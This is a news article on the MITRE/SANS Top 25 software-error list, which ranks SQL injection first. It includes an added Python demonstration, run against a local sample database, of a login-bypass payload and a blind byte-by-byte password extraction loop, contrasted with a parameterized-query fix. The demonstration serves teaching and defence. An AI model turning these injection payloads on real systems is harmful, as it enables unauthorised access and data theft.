SQL Injection Deemed No. 1 Software Flaw
25 Most Dangerous Programming Errors Listed

That's according to a list of the 25 most dangerous programming errors issued Monday by MITRE, the not-for-profit contractor that manages an array of federal government technology and engineering programs, and the SANS Institute, an organization that provides IT security training.
The release of the list coincides with the issuance by MITRE and the Department of Homeland Security of the Common Weakness Scoring System and the Common Weakness Risk Analysis Framework, initiatives aimed at identifying vulnerabilities in software.
In application-security lingo, the SQL injection problem is officially known as CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE stands for Common Weakness Enumeration).
Hackers used SQL injection to compromise organizations such as Sony Pictures, PBS, MySQL.com, security company HBGary and many others just this year, the MITRE/SANS report says, adding:
"If attackers can influence the SQL (structured query language) that you use to communicate with your database, then suddenly all your fun and profit belongs to them. If you use SQL queries in security controls such as authentication, attackers could alter the logic of those queries to bypass security. They could modify the queries to steal, corrupt or otherwise change your underlying data. They'll even steal data one byte at a time if they have to, and they have the patience and know-how to do so."
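The two attacks the report describes, an authentication bypass and byte-at-a-time data theft, can both be shown against one small login query. The following is an added example, not code from the MITRE/SANS report: it uses Python's sqlite3 module with an in-memory database, a constructed users table and made-up credentials, and contrasts a query built by string concatenation (the CWE-89 pattern) with the same query using bound parameters.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite database with one users
    table. The table layout, names and passwords are assumptions made for
    this demonstration, not data from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cr3t", "admin"), ("alice", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Authentication query assembled by string concatenation (CWE-89).
    Anything the caller puts in name or password becomes SQL syntax."""
    sql = ("SELECT role FROM users WHERE name = '" + name
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, name, password):
    """The same query with bound parameters: the driver sends the input as
    data, so quotes and comment markers in it never reach the SQL parser."""
    row = conn.execute(
        "SELECT role FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] if row else None


def blind_extract_password(conn, target, max_len=32):
    """Recover target's password one byte at a time using only the yes/no
    answer the vulnerable login gives (boolean-based blind injection).
    Each probe asks the database: is byte i of the password equal to c?
    The injected '-- ' comments out the real password check."""
    recovered = ""
    for i in range(1, max_len + 1):
        found = None
        for c in range(32, 127):  # printable ASCII candidates
            payload = f"{target}' AND unicode(substr(password,{i},{1}))={c} -- "
            if login_vulnerable(conn, payload, "x") is not None:
                found = chr(c)
                break
        if found is None:
            break  # substr() past the end yields '' (unicode -> NULL): done
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Bypass: the comment marker drops the password check entirely.
    print("bypass via concatenation:", login_vulnerable(db, "admin' -- ", "wrong"))
    print("same payload, parameterized:", login_parameterized(db, "admin' -- ", "wrong"))
    # Theft: ~95 probes per byte, no error messages or data in the response needed.
    print("blind extraction:", blind_extract_password(db, "admin"))
```

The bypass payload `admin' -- ` turns the concatenated query into `... WHERE name = 'admin' -- ' AND password = 'wrong'`, so the password clause is commented away; the parameterized version looks for a user literally named `admin' -- ` and finds none. The blind loop needs nothing but the login's true/false behaviour, which is exactly the "one byte at a time" patience the report warns about.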
The catalog of 25 most dangerous programming errors updates a list issued 2½ years ago (see Security Experts Unveil List of Common Vulnerabilities and How to Fix Them). Errors in the original list were not ranked. "This year's list is a collection of the worst software weaknesses that happen the most and are easiest to exploit," MITRE CWE Project Leader Bob Martin says.
The 2011 list employed three of the 18 factors in the Common Weakness Scoring System: how often the weakness occurs in software, how severe the consequences are when it does, and how easy it is to exploit.
The Common Weakness Scoring System and the Common Weakness Risk Analysis Framework are aimed at helping vendors identify security flaws in the software they develop and aid their customers in vendor management by knowing what they're getting. "It provides the first incentive system to persuade programmers and software companies that security flaws must be fixed before they deliver the code to the users," says SANS Institute Research Director Alan Paller. "If every buyer asks for a report showing how well the developer did on the top 25, it will be a very short time before the programmers stop making those errors because sending a report saying they made the errors is the same as saying the programmers are incompetent."
Bruce McConnell, counselor to DHS's National Protection and Programs Directorate, says the release of the top 25 list and the scoring system represents a milestone in collaboration between government and the private sector on software security. The concurrent releases, he says, "are extremely successful examples of the type of public-private collaboration the department has been advocating to improve the nation's cybersecurity."